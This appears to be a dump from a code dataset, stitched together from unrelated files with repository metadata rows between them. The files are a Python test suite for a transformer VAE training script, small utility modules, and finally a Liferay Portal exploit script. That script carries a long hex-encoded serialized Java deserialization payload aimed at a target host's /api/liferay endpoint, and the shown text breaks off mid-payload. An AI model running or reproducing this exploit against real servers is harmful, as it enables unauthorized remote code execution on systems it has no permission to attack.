--validation_file ./tests/fixtures/max_len_3.json
--do_train
--do_eval
--per_device_train_batch_size 5
--per_device_eval_batch_size 5
--num_train_epochs 2
--set_seq_size 4
--latent_size 2
--output_dir {tmp_dir}
--overwrite_output_dir
""".split()
if torch.cuda.device_count() > 1:
# Skipping because there are not enough batches to train the model + would need a drop_last to work.
return
if torch_device != "cuda":
testargs.append("--no_cuda")
with patch.object(sys, "argv", testargs):
result = main()
self.assertAlmostEqual(result["epoch"], 2.0)
def test_train_python_syntax_seq_check(self):
stream_handler = logging.StreamHandler(sys.stdout)
logger.addHandler(stream_handler)
tmp_dir = self.get_auto_remove_tmp_dir()
testargs = f"""
train.py
--train_file ./tests/fixtures/line_by_line_max_len_3.txt
--validation_file ./tests/fixtures/line_by_line_max_len_3.txt
--do_train
--do_eval
--sample_from_latent
--per_device_train_batch_size 4
--per_device_eval_batch_size 4
--num_train_epochs 1
--set_seq_size 8
--n_latent_tokens 1
--latent_size 2
--output_dir {tmp_dir}
--overwrite_output_dir
--seq_check python
""".split()
if torch.cuda.device_count() > 1:
# Skipping because there are not enough batches to train the model + would need a drop_last to work.
return
if torch_device != "cuda":
testargs.append("--no_cuda")
with patch.object(sys, "argv", testargs):
result = main()
self.assertAlmostEqual(result["epoch"], 1.0)
def test_train_non_vae(self):
stream_handler = logging.StreamHandler(sys.stdout)
logger.addHandler(stream_handler)
tmp_dir = self.get_auto_remove_tmp_dir()
testargs = f"""
train.py
--train_file ./tests/fixtures/line_by_line_max_len_3.txt
--validation_file ./tests/fixtures/line_by_line_max_len_3.txt
--do_train
--do_eval
--per_device_train_batch_size 4
--per_device_eval_batch_size 4
--num_train_epochs 2
--set_seq_size 4
--dont_use_reg_loss
--output_dir {tmp_dir}
--overwrite_output_dir
""".split()
if torch.cuda.device_count() > 1:
# Skipping because there are not enough batches to train the model + would need a drop_last to work.
return
if torch_device != "cuda":
testargs.append("--no_cuda")
with patch.object(sys, "argv", testargs):
result = main()
self.assertAlmostEqual(result["epoch"], 2.0)
def test_train_unsupervised_classification(self):
stream_handler = logging.StreamHandler(sys.stdout)
logger.addHandler(stream_handler)
tmp_dir = self.get_auto_remove_tmp_dir()
testargs = f"""
train.py
--dataset_name=Fraser/news-category-dataset
--text_column=headline
--classification_column=category_num
--do_eval
--per_device_train_batch_size 2
--per_device_eval_batch_size 2
--max_validation_size 100
--eval_steps 4
--latent_size 2
--output_dir {tmp_dir}
--overwrite_output_dir
""".split()
if torch.cuda.device_count() > 1:
# Skipping because there are not enough batches to train the model + would need a drop_last to work.
return
if torch_device != "cuda":
testargs.append("--no_cuda")
with patch.object(sys, "argv", testargs):
result = main()
self.assertGreater(result["eval_loss"], 0.0)
self.assertNotIn("epoch", result)
def test_train_n_tokens_model(self):
stream_handler = logging.StreamHandler(sys.stdout)
logger.addHandler(stream_handler)
tmp_dir = self.get_auto_remove_tmp_dir()
testargs = f"""
train.py
--train_file ./tests/fixtures/line_by_line_max_len_3.txt
--validation_file ./tests/fixtures/line_by_line_max_len_3.txt
--do_train
--per_device_train_batch_size 2
--num_train_epochs 1
--set_seq_size 4
--n_latent_tokens 2
--latent_size 2
--output_dir {tmp_dir}
--overwrite_output_dir
""".split()
if torch.cuda.device_count() > 1:
# Skipping because there are not enough batches to train the model + would need a drop_last to work.
return
if torch_device != "cuda":
testargs.append("--no_cuda")
with patch.object(sys, "argv", testargs):
main()
def test_train_unsupervised_classification_agnews(self):
stream_handler = logging.StreamHandler(sys.stdout)
logger.addHandler(stream_handler)
tmp_dir = self.get_auto_remove_tmp_dir()
testargs = f"""
train.py
--dataset_name=ag_news
--classification_column=label
--do_train
--max_steps=10
--validation_name=test
--test_classification
--per_device_train_batch_size 2
--per_device_eval_batch_size 2
--max_validation_size 100
--latent_size 2
--output_dir {tmp_dir}
--overwrite_output_dir
""".split()
if torch.cuda.device_count() > 1:
# Skipping because there are not enough batches to train the model + would need a drop_last to work.
return
if torch_device != "cuda":
testargs.append("--no_cuda")
with patch.object(sys, "argv", testargs):
main()
def test_train(self):
stream_handler = logging.StreamHandler(sys.stdout)
logger.addHandler(stream_handler)
tmp_dir = self.get_auto_remove_tmp_dir()
testargs = f"""
train.py
--train_file ./tests/fixtures/line_by_line_max_len_3.txt
--validation_file ./tests/fixtures/line_by_line_max_len_3.txt
--do_train
--do_eval
--eval_steps 3
--evaluation_strategy steps
--sample_from_latent
--per_device_train_batch_size 2
--per_device_eval_batch_size 2
--num_train_epochs 1
--set_seq_size 8
--n_latent_tokens 1
--latent_size 2
--output_dir {tmp_dir}
--overwrite_output_dir
""".split()
if torch.cuda.device_count() > 1:
# Skipping because there are not enough batches to train the model + would need a drop_last to work.
return
if torch_device != "cuda":
testargs.append("--no_cuda")
with patch.object(sys, "argv", testargs):
result = main()
self.assertAlmostEqual(result["epoch"], 1.0)
def test_train_critic(self):
stream_handler = logging.StreamHandler(sys.stdout)
logger.addHandler(stream_handler)
tmp_dir = self.get_auto_remove_tmp_dir()
testargs = f"""
train.py
--train_file ./tests/fixtures/line_by_line_max_len_3.txt
--validation_file ./tests/fixtures/line_by_line_max_len_3.txt
--do_train
--do_eval
--eval_steps 3
--evaluation_strategy steps
--sample_from_latent
--per_device_train_batch_size 4
--per_device_eval_batch_size 4
--num_train_epochs 1
--set_seq_size 8
--n_latent_tokens 1
--latent_size 2
--transformer_critic_name funnel-transformer/intermediate
--output_dir {tmp_dir}
--overwrite_output_dir
""".split()
if torch.cuda.device_count() > 1:
# Skipping because there are not enough batches to train the model + would need a drop_last to work.
return
if torch_device != "cuda":
testargs.append("--no_cuda")
with patch.object(sys, "argv", testargs):
result = main()
self.assertAlmostEqual(result["epoch"], 1.0)
def test_train_cycle_loss(self):
stream_handler = logging.StreamHandler(sys.stdout)
logger.addHandler(stream_handler)
tmp_dir = self.get_auto_remove_tmp_dir()
testargs = f"""
train.py
--train_file ./tests/fixtures/line_by_line_max_len_3.txt
--validation_file ./tests/fixtures/line_by_line_max_len_3.txt
--do_train
--do_eval
--eval_steps 3
--evaluation_strategy steps
--sample_from_latent
--per_device_train_batch_size 4
--per_device_eval_batch_size 4
--num_train_epochs 1
--set_seq_size 8
--n_latent_tokens 1
--latent_size 2
--cycle_loss
--output_dir {tmp_dir}
--overwrite_output_dir
""".split()
if torch.cuda.device_count() > 1:
# Skipping because there are not enough batches to train the model + would need a drop_last to work.
return
if torch_device != "cuda":
testargs.append("--no_cuda")
with patch.object(sys, "argv", testargs):
result = main()
self.assertAlmostEqual(result["epoch"], 1.0)
def test_interpolate_training_step_rate(self):
stream_handler = logging.StreamHandler(sys.stdout)
logger.addHandler(stream_handler)
tmp_dir = self.get_auto_remove_tmp_dir()
testargs = f"""
train.py
--train_file ./tests/fixtures/line_by_line_max_len_3.txt
--validation_file ./tests/fixtures/line_by_line_max_len_3.txt
--do_train
--do_eval
--eval_steps 3
--evaluation_strategy steps
--sample_from_latent
--per_device_train_batch_size 4
--per_device_eval_batch_size 4
--interpolate_training_step_rate 2
--cycle_loss
--transformer_critic_name funnel-transformer/intermediate
--num_train_epochs 1
--set_seq_size 8
--min_critic_steps 1
--n_latent_tokens 1
--latent_size 2
--output_dir {tmp_dir}
--overwrite_output_dir
""".split()
if torch.cuda.device_count() > 1:
# Skipping because there are not enough batches to train the model + would need a drop_last to work.
return
if torch_device != "cuda":
testargs.append("--no_cuda")
with patch.object(sys, "argv", testargs):
result = main()
self.assertAlmostEqual(result["epoch"], 1.0)
def test_train_latent_decoder_t5_norm(self):
stream_handler = logging.StreamHandler(sys.stdout)
logger.addHandler(stream_handler)
tmp_dir = self.get_auto_remove_tmp_dir()
testargs = f"""
train.py
--train_file ./tests/fixtures/line_by_line_max_len_3.txt
--validation_file ./tests/fixtures/line_by_line_max_len_3.txt
--do_train
--do_eval
--decoder_model t5_norm
--per_device_train_batch_size 4
--per_device_eval_batch_size 4
--num_train_epochs 2
--set_seq_size 5
--latent_size 2
--output_dir {tmp_dir}
--overwrite_output_dir
""".split()
if torch.cuda.device_count() > 1:
# Skipping because there are not enough batches to train the model + would need a drop_last to work.
return
if torch_device != "cuda":
testargs.append("--no_cuda")
with patch.object(sys, "argv", testargs):
result = main()
self.assertAlmostEqual(result["epoch"], 2.0)
def test_train_latent_decoder_funnel_norm(self):
stream_handler = logging.StreamHandler(sys.stdout)
logger.addHandler(stream_handler)
tmp_dir = self.get_auto_remove_tmp_dir()
testargs = f"""
train.py
--train_file ./tests/fixtures/line_by_line_max_len_3.txt
--validation_file ./tests/fixtures/line_by_line_max_len_3.txt
--do_train
--do_eval
--decoder_model funnel_norm
--per_device_train_batch_size 4
--per_device_eval_batch_size 4
--num_train_epochs 2
--set_seq_size 5
--latent_size 2
--output_dir {tmp_dir}
--overwrite_output_dir
""".split()
if torch.cuda.device_count() > 1:
# Skipping because there are not enough batches to train the model + would need a drop_last to work.
return
if torch_device != "cuda":
testargs.append("--no_cuda")
with patch.object(sys, "argv", testargs):
result = main()
self.assertAlmostEqual(result["epoch"], 2.0)
def test_train_vae_cycle_loss(self):
stream_handler = logging.StreamHandler(sys.stdout)
logger.addHandler(stream_handler)
tmp_dir = self.get_auto_remove_tmp_dir()
testargs = f"""
train.py
--train_file ./tests/fixtures/line_by_line_max_len_3.txt
--validation_file ./tests/fixtures/line_by_line_max_len_3.txt
--do_train
--do_eval
--vae_cycle_loss
--per_device_train_batch_size 4
--per_device_eval_batch_size 4
--num_train_epochs 2
--set_seq_size 5
--latent_size 2
--output_dir {tmp_dir}
--overwrite_output_dir
""".split()
if torch.cuda.device_count() > 1:
# Skipping because there are not enough batches to train the model + would need a drop_last to work.
return
if torch_device != "cuda":
testargs.append("--no_cuda")
with patch.object(sys, "argv", testargs):
result = main()
self.assertAlmostEqual(result["epoch"], 2.0)
def test_train_deepspeed(self):
'''
Can only run with CUDA.
'''
stream_handler = logging.StreamHandler(sys.stdout)
logger.addHandler(stream_handler)
tmp_dir = self.get_auto_remove_tmp_dir()
testargs = f"""
train.py
--deepspeed deepspeed/ds_config.json
--train_file ./tests/fixtures/line_by_line_max_len_3.txt
--validation_file ./tests/fixtures/line_by_line_max_len_3.txt
--do_train
--do_eval
--per_device_train_batch_size 4
--per_device_eval_batch_size 4
--num_train_epochs 2
--set_seq_size 5
--latent_size 2
--output_dir {tmp_dir}
--overwrite_output_dir
""".split()
if torch.cuda.device_count() > 1:
# Skipping because there are not enough batches to train the model + would need a drop_last to work.
return
if torch_device != "cuda":
testargs.append("--no_cuda")
with patch.object(sys, "argv", testargs):
result = main()
self.assertAlmostEqual(result["epoch"], 2.0)
def test_train_adafactor(self):
stream_handler = logging.StreamHandler(sys.stdout)
logger.addHandler(stream_handler)
tmp_dir = self.get_auto_remove_tmp_dir()
testargs = f"""
train.py
--adafactor
--train_file ./tests/fixtures/line_by_line_max_len_3.txt
--validation_file ./tests/fixtures/line_by_line_max_len_3.txt
--do_train
--do_eval
--per_device_train_batch_size 4
--per_device_eval_batch_size 4
--num_train_epochs 2
--set_seq_size 5
--latent_size 2
--output_dir {tmp_dir}
--overwrite_output_dir
""".split()
if torch.cuda.device_count() > 1:
# Skipping because there are not enough batches to train the model + would need a drop_last to work.
return
if torch_device != "cuda":
testargs.append("--no_cuda")
with patch.object(sys, "argv", testargs):
result = main()
self.assertAlmostEqual(result["epoch"], 2.0)
def test_train_local_gpt2_tokenizer(self):
stream_handler = logging.StreamHandler(sys.stdout)
logger.addHandler(stream_handler)
tmp_dir = self.get_auto_remove_tmp_dir()
testargs = f"""
train.py
--train_file ./tests/fixtures/all_len_16.txt
--validation_file ./tests/fixtures/all_len_16.txt
--do_train
--do_eval
--tokenizer_name tokenizers/tkn_mnist-text-small_byte
--per_device_train_batch_size 4
--per_device_eval_batch_size 4
--num_train_epochs 2
--set_seq_size 16
--latent_size 2
--output_dir {tmp_dir}
--overwrite_output_dir
""".split()
if torch.cuda.device_count() > 1:
# Skipping because there are not enough batches to train the model + would need a drop_last to work.
return
if torch_device != "cuda":
testargs.append("--no_cuda")
with patch.object(sys, "argv", testargs):
result = main()
self.assertAlmostEqual(result["epoch"], 2.0)
def test_train_render_text_image(self):
stream_handler = logging.StreamHandler(sys.stdout)
logger.addHandler(stream_handler)
tmp_dir = self.get_auto_remove_tmp_dir()
testargs = f"""
train.py
--dataset_name=Fraser/mnist-text-default
--eval_steps 2
--validation_name test
--do_eval
--tokenizer_name tokenizers/tkn_mnist-text-small_byte
--sample_from_latent
--render_text_image
--seq_check python
--dont_clean_up_tokenization_spaces
--per_device_train_batch_size 2
--per_device_eval_batch_size 2
--num_train_epochs 2
--set_seq_size 237
--generate_max_len 2
--latent_size 2
--output_dir {tmp_dir}
--overwrite_output_dir
""".split()
if torch.cuda.device_count() > 1:
# Skipping because there are not enough batches to train the model + would need a drop_last to work.
return
if torch_device != "cuda":
testargs.append("--no_cuda")
with patch.object(sys, "argv", testargs):
result = main()
self.assertAlmostEqual(result["epoch"], 2.0)
def test_train_grad_checkpoint(self):
stream_handler = logging.StreamHandler(sys.stdout)
logger.addHandler(stream_handler)
tmp_dir = self.get_auto_remove_tmp_dir()
testargs = f"""
train.py
--decoder_grad_chk_pnt_rate=3
--gradient_checkpoint_encoder
--train_file ./tests/fixtures/line_by_line_max_len_3.txt
--validation_file ./tests/fixtures/line_by_line_max_len_3.txt
--do_train
--do_eval
--per_device_train_batch_size 4
--per_device_eval_batch_size 4
--num_train_epochs 2
--set_seq_size 5
--latent_size 2
--output_dir {tmp_dir}
--overwrite_output_dir
""".split()
if torch.cuda.device_count() > 1:
# Skipping because there are not enough batches to train the model + would need a drop_last to work.
return
if torch_device != "cuda":
testargs.append("--no_cuda")
with patch.object(sys, "argv", testargs):
result = main()
self.assertAlmostEqual(result["epoch"], 2.0)
def test_train_window_attn_overlap_every_other_layer(self):
stream_handler = logging.StreamHandler(sys.stdout)
logger.addHandler(stream_handler)
tmp_dir = self.get_auto_remove_tmp_dir()
testargs = f"""
train.py
--attention_window_size=7
--train_file ./tests/fixtures/all_len_16.txt
--validation_file ./tests/fixtures/all_len_16.txt
--do_train
--do_eval
--per_device_train_batch_size 4
--per_device_eval_batch_size 4
--num_train_epochs 2
--set_seq_size 16
--latent_size 2
--output_dir {tmp_dir}
--overwrite_output_dir
""".split()
if torch.cuda.device_count() > 1:
# Skipping because there are not enough batches to train the model + would need a drop_last to work.
return
if torch_device != "cuda":
testargs.append("--no_cuda")
with patch.object(sys, "argv", testargs):
result = main()
self.assertAlmostEqual(result["epoch"], 2.0)
def test_gradual_interpolation_inputs(self):
latent_start = torch.tensor([[1.0, 1.0], [3.0, 4.0], [5.0, 6.0]])
latent_end = torch.tensor([[-1.0, -1.0], [7.0, 8.0], [9.0, 10.0]])
VAE_Trainer.gradual_interpolation_inputs(latent_start, latent_end, 'cpu', False)
| 34.629734 | 112 | 0.582317 | 2,950 | 24,691 | 4.540339 | 0.066102 | 0.028222 | 0.045692 | 0.040765 | 0.90772 | 0.903838 | 0.891145 | 0.886964 | 0.880842 | 0.880842 | 0 | 0.015617 | 0.325746 | 24,691 | 712 | 113 | 34.678371 | 0.788924 | 0.085173 | 0 | 0.878893 | 0 | 0 | 0.516105 | 0.168412 | 0 | 0 | 0 | 0 | 0.034602 | 1 | 0.038062 | false | 0 | 0.010381 | 0 | 0.086505 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
eca69f2c2c9009213ed024a931e6f81576174619 | 113 | py | Python | 03 - Strings/Text Wrap.py | LynX-gh/HackerRank-python | 52705f423dd564463c67de1b8a2ded49bbef565e | [
"MIT"
] | null | null | null | 03 - Strings/Text Wrap.py | LynX-gh/HackerRank-python | 52705f423dd564463c67de1b8a2ded49bbef565e | [
"MIT"
] | null | null | null | 03 - Strings/Text Wrap.py | LynX-gh/HackerRank-python | 52705f423dd564463c67de1b8a2ded49bbef565e | [
"MIT"
] | null | null | null | def wrap(string, max_width):
wrap_string = '\n'.join(textwrap.wrap(string, max_width))
return wrap_string | 37.666667 | 61 | 0.725664 | 17 | 113 | 4.588235 | 0.529412 | 0.512821 | 0.333333 | 0.461538 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.141593 | 113 | 3 | 62 | 37.666667 | 0.804124 | 0 | 0 | 0 | 0 | 0 | 0.017544 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0 | 0 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 7 |
eca8f86c143795b64b85379dbf76bf5f1a85f26b | 842 | py | Python | eulerangles/rotations.py | brisvag/eulerangles | 3189cf850d5415defb89910d392f4b18d0188f3b | [
"BSD-3-Clause"
] | null | null | null | eulerangles/rotations.py | brisvag/eulerangles | 3189cf850d5415defb89910d392f4b18d0188f3b | [
"BSD-3-Clause"
] | null | null | null | eulerangles/rotations.py | brisvag/eulerangles | 3189cf850d5415defb89910d392f4b18d0188f3b | [
"BSD-3-Clause"
] | null | null | null | import numpy as np
from .conversions import theta2rotm
class RotX(np.ndarray):
"""
Rotation matrix or matrices for rotation around the x-axis by theta
positive is ccw when looking at the origin against the axis
"""
def __new__(cls, theta: np.ndarray):
obj = theta2rotm(theta, axis='x')
class RotY(np.ndarray):
"""
Rotation matrix or matrices for rotation around the y-axis by theta
positive is ccw when looking at the origin against the axis
"""
def __new__(cls, theta: np.ndarray):
obj = theta2rotm(theta, axis='y')
class RotZ(np.ndarray):
"""
Rotation matrix or matrices for rotation around the y-axis by theta
positive is ccw when looking at the origin against the axis
"""
def __new__(cls, theta: np.ndarray):
obj = theta2rotm(theta, axis='z')
| 24.764706 | 71 | 0.671021 | 122 | 842 | 4.532787 | 0.303279 | 0.097649 | 0.092224 | 0.124774 | 0.860759 | 0.860759 | 0.860759 | 0.860759 | 0.860759 | 0.860759 | 0 | 0.00627 | 0.24228 | 842 | 33 | 72 | 25.515152 | 0.860502 | 0.454869 | 0 | 0.272727 | 0 | 0 | 0.007481 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.272727 | false | 0 | 0.181818 | 0 | 0.727273 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
ecf0dd4c32d64ab2dddfa7deaad041bf8a32412f | 228 | py | Python | moha/posthf/ci/__init__.py | ZhaoYilin/moha | d701fd921839474380982db1478e66f0dc8cbd98 | [
"MIT"
] | 12 | 2019-12-07T18:37:34.000Z | 2022-03-30T14:23:38.000Z | moha/posthf/ci/__init__.py | ZhaoYilin/moha | d701fd921839474380982db1478e66f0dc8cbd98 | [
"MIT"
] | null | null | null | moha/posthf/ci/__init__.py | ZhaoYilin/moha | d701fd921839474380982db1478e66f0dc8cbd98 | [
"MIT"
] | 2 | 2019-12-08T05:48:47.000Z | 2021-10-31T21:40:21.000Z | from __future__ import division, print_function
from __future__ import absolute_import
from moha.posthf.ci.auxiliary import *
from moha.posthf.ci.cis import *
from moha.posthf.ci.cisd import *
from moha.posthf.ci.fci import *
| 25.333333 | 47 | 0.807018 | 35 | 228 | 4.971429 | 0.4 | 0.229885 | 0.321839 | 0.45977 | 0.505747 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.118421 | 228 | 8 | 48 | 28.5 | 0.865672 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0.166667 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
01dcb9893516f8b41f619370adc26f855a4b247e | 17,869 | py | Python | Liferay Portal/image_bypass.py | iamarkaj/poc | 983dcf94577b1a041f304c8e0537b670c0c18655 | [
"BSD-3-Clause"
] | 1,007 | 2018-09-17T16:13:26.000Z | 2022-03-29T00:19:42.000Z | Liferay Portal/image_bypass.py | iamarkaj/poc | 983dcf94577b1a041f304c8e0537b670c0c18655 | [
"BSD-3-Clause"
] | 5 | 2018-11-11T09:54:27.000Z | 2020-06-24T22:59:49.000Z | Liferay Portal/image_bypass.py | iamarkaj/poc | 983dcf94577b1a041f304c8e0537b670c0c18655 | [
"BSD-3-Clause"
] | 325 | 2018-09-18T04:44:53.000Z | 2022-03-30T18:08:13.000Z | #
# Exploits deserialization on Liferay CE Portal 7.0 GA3 via
# the url: /api/liferay. Note that we may be restricted from
# this URL via an ACL.
#
# Usage example:
# python image_bypass.py 192.168.1.208 8080
#
import socket
import sys
if len(sys.argv) != 3:
print 'Usage: ./image_bypass.py <host> <port>'
sys.exit(0)
payload = '\xac\xed\x00\x05\x73\x72\x00\x30\x6a\x61\x76\x61\x78\x2e\x6d\x65\x64\x69\x61\x2e\x6a\x61\x69\x2e\x72\x65\x6d\x6f\x74\x65\x2e\x53\x65\x72\x69\x61\x6c\x69\x7a\x61\x62\x6c\x65\x52\x65\x6e\x64\x65\x72\x65\x64\x49\x6d\x61\x67\x65\x8a\x0a\x94\x12\xb0\x8e\x3c\x06\x03\x00\x16\x49\x00\x06\x68\x65\x69\x67\x68\x74\x5a\x00\x0e\x69\x73\x53\x6f\x75\x72\x63\x65\x52\x65\x6d\x6f\x74\x65\x49\x00\x08\x6d\x69\x6e\x54\x69\x6c\x65\x58\x49\x00\x08\x6d\x69\x6e\x54\x69\x6c\x65\x59\x49\x00\x04\x6d\x69\x6e\x58\x49\x00\x04\x6d\x69\x6e\x59\x49\x00\x09\x6e\x75\x6d\x58\x54\x69\x6c\x65\x73\x49\x00\x09\x6e\x75\x6d\x59\x54\x69\x6c\x65\x73\x49\x00\x04\x70\x6f\x72\x74\x49\x00\x0f\x74\x69\x6c\x65\x47\x72\x69\x64\x58\x4f\x66\x66\x73\x65\x74\x49\x00\x0f\x74\x69\x6c\x65\x47\x72\x69\x64\x59\x4f\x66\x66\x73\x65\x74\x49\x00\x0a\x74\x69\x6c\x65\x48\x65\x69\x67\x68\x74\x49\x00\x09\x74\x69\x6c\x65\x57\x69\x64\x74\x68\x5a\x00\x0b\x75\x73\x65\x44\x65\x65\x70\x43\x6f\x70\x79\x5a\x00\x0c\x75\x73\x65\x54\x69\x6c\x65\x43\x6f\x64\x65\x63\x49\x00\x05\x77\x69\x64\x74\x68\x4c\x00\x03\x55\x49\x44\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x4f\x62\x6a\x65\x63\x74\x3b\x4c\x00\x0d\x64\x65\x63\x6f\x64\x69\x6e\x67\x50\x61\x72\x61\x6d\x74\x00\x32\x4c\x6a\x61\x76\x61\x78\x2f\x6d\x65\x64\x69\x61\x2f\x6a\x61\x69\x2f\x74\x69\x6c\x65\x63\x6f\x64\x65\x63\x2f\x54\x69\x6c\x65\x43\x6f\x64\x65\x63\x50\x61\x72\x61\x6d\x65\x74\x65\x72\x4c\x69\x73\x74\x3b\x4c\x00\x0d\x65\x6e\x63\x6f\x64\x69\x6e\x67\x50\x61\x72\x61\x6d\x71\x00\x7e\x00\x02\x4c\x00\x0a\x66\x6f\x72\x6d\x61\x74\x4e\x61\x6d\x65\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x4c\x00\x04\x68\x6f\x73\x74\x74\x00\x16\x4c\x6a\x61\x76\x61\x2f\x6e\x65\x74\x2f\x49\x6e\x65\x74\x41\x64\x64\x72\x65\x73\x73\x3b\x4c\x00\x0b\x69\x6d\x61\x67\x65\x42\x6f\x75\x6e\x64\x73\x74\x00\x14\x4c\x6a\x61\x76\x61\x2f\x61\x77\x74\x2f\x52\x65\x63\x74\x61\x6e\x67\x6c\x65\x3b\x78\x70\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x01\x01\x01\x00\x00\x00\x01\x73\x72\x00\x14\x6a\x61\x76\x61\x2e\x6d\x61\x74\x68\x2e\x42\x69\x67\x49\x6e\x74\x65\x67\x65\x72\x8c\xfc\x9f\x1f\xa9\x3b\xfb\x1d\x03\x00\x06\x49\x00\x08\x62\x69\x74\x43\x6f\x75\x6e\x74\x49\x00\x09\x62\x69\x74\x4c\x65\x6e\x67\x74\x68\x49\x00\x13\x66\x69\x72\x73\x74\x4e\x6f\x6e\x7a\x65\x72\x6f\x42\x79\x74\x65\x4e\x75\x6d\x49\x00\x0c\x6c\x6f\x77\x65\x73\x74\x53\x65\x74\x42\x69\x74\x49\x00\x06\x73\x69\x67\x6e\x75\x6d\x5b\x00\x09\x6d\x61\x67\x6e\x69\x74\x75\x64\x65\x74\x00\x02\x5b\x42\x78\x72\x00\x10\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4e\x75\x6d\x62\x65\x72\x86\xac\x95\x1d\x0b\x94\xe0\x8b\x02\x00\x00\x78\x70\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xfe\xff\xff\xff\xfe\x00\x00\x00\x01\x75\x72\x00\x02\x5b\x42\xac\xf3\x17\xf8\x06\x08\x54\xe0\x02\x00\x00\x78\x70\x00\x00\x00\x20\x01\x00\x00\x00\x00\x00\x00\x00\xd9\xe7\xd2\x66\x16\xd8\xfb\x1e\xc2\x2a\x2c\x10\x57\x01\x00\x00\x77\xa3\xac\x80\x61\xad\xe5\x3f\x78\x70\x70\x74\x00\x03\x72\x61\x77\x73\x72\x00\x14\x6a\x61\x76\x61\x2e\x6e\x65\x74\x2e\x49\x6e\x65\x74\x41\x64\x64\x72\x65\x73\x73\x2d\x9b\x57\xaf\x9f\xe3\xeb\xdb\x03\x00\x03\x49\x00\x07\x61\x64\x64\x72\x65\x73\x73\x49\x00\x06\x66\x61\x6d\x69\x6c\x79\x4c\x00\x08\x68\x6f\x73\x74\x4e\x61\x6d\x65\x71\x00\x7e\x00\x03\x78\x70\x7f\x00\x01\x01\x00\x00\x00\x02\x74\x00\x06\x75\x62\x75\x6e\x74\x75\x78\x73\x72\x00\x12\x6a\x61\x76\x61\x2e\x61\x77\x74\x2e\x52\x65\x63\x74\x61\x6e\x67\x6c\x65\xc3\xb0\x6a\x05\x1a\xca\x6a\x74\x02\x00\x04\x49\x00\x06\x68\x65\x69\x67\x68\x74\x49\x00\x05\x77\x69\x64\x74\x68\x49\x00\x01\x78\x49\x00\x01\x79\x78\x70\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x73\x72\x00\x26\x63\x6f\x6d\x2e\x73\x75\x6e\x2e\x6d\x65\x64\x69\x61\x2e\x6a\x61\x69\x2e\x72\x6d\x69\x2e\x53\x61\x6d\x70\x6c\x65\x4d\x6f\x64\x65\x6c\x53\x74\x61\x74\x65\x09\x43\x1b\xbd\xfd\xbb\xdf\x14\x03\x00\x00\x78\x72\x00\x2b\x63\x6f\x6d\x2e\x73\x75\x6e\x2e\x6d\x65\x64\x69\x61\x2e\x6a\x61\x69\x2e\x72\x6d\x69\x2e\x53\x65\x72\x69\x61\x6c\x69\x7a\x61\x62\x6c\x65\x53\x74\x61\x74\x65\x49\x6d\x70\x6c\x00\x99\x9f\x6f\x39\x5a\x14\xba\x02\x00\x01\x4c\x00\x08\x74\x68\x65\x43\x6c\x61\x73\x73\x74\x00\x11\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x43\x6c\x61\x73\x73\x3b\x78\x70\x76\x72\x00\x2a\x6a\x61\x76\x61\x2e\x61\x77\x74\x2e\x69\x6d\x61\x67\x65\x2e\x50\x69\x78\x65\x6c\x49\x6e\x74\x65\x72\x6c\x65\x61\x76\x65\x64\x53\x61\x6d\x70\x6c\x65\x4d\x6f\x64\x65\x6c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x78\x70\x77\x18\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x03\x00\x00\x00\x03\x75\x72\x00\x02\x5b\x49\x4d\xba\x60\x26\x76\xea\xb2\xa5\x02\x00\x00\x78\x70\x00\x00\x00\x03\x00\x00\x00\x02\x00\x00\x00\x01\x00\x00\x00\x00\x78\x73\x72\x00\x25\x63\x6f\x6d\x2e\x73\x75\x6e\x2e\x6d\x65\x64\x69\x61\x2e\x6a\x61\x69\x2e\x72\x6d\x69\x2e\x43\x6f\x6c\x6f\x72\x4d\x6f\x64\x65\x6c\x53\x74\x61\x74\x65\x4a\xbd\x88\x6f\x26\x2e\x15\x54\x03\x00\x00\x78\x71\x00\x7e\x00\x14\x76\x72\x00\x22\x6a\x61\x76\x61\x2e\x61\x77\x74\x2e